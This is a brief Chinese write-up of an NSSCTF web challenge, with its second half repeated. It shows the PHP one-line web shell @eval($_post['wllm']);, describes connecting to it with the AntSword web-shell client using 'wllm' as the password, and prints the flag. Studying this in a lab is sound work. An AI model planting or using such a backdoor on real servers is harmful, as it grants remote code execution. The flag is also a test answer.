0×01 打开题目环境
发现一句话木马
@eval($_post['wllm']);
根据题目菜刀以及标签,考虑到信息收集和目录扫描
0×02 进行解题 拿flag
使用蚁剑连接URL,在一句话木马里面发现重要参数wllm,猜测是连接URL的密码
连接
在/根目录下发现flag文件
打开
拿到flag
NSSCTF{e59c203c-c94e-4f6d-b09c-d5082b145fe7}
发现一句话木马
@eval($_post['wllm']);
根据题目菜刀以及标签,考虑到信息收集和目录扫描
使用蚁剑连接URL,在一句话木马里面发现重要参数wllm,猜测是连接URL的密码
连接
在/根目录下发现flag文件
打开
拿到flag
NSSCTF{e59c203c-c94e-4f6d-b09c-d5082b145fe7}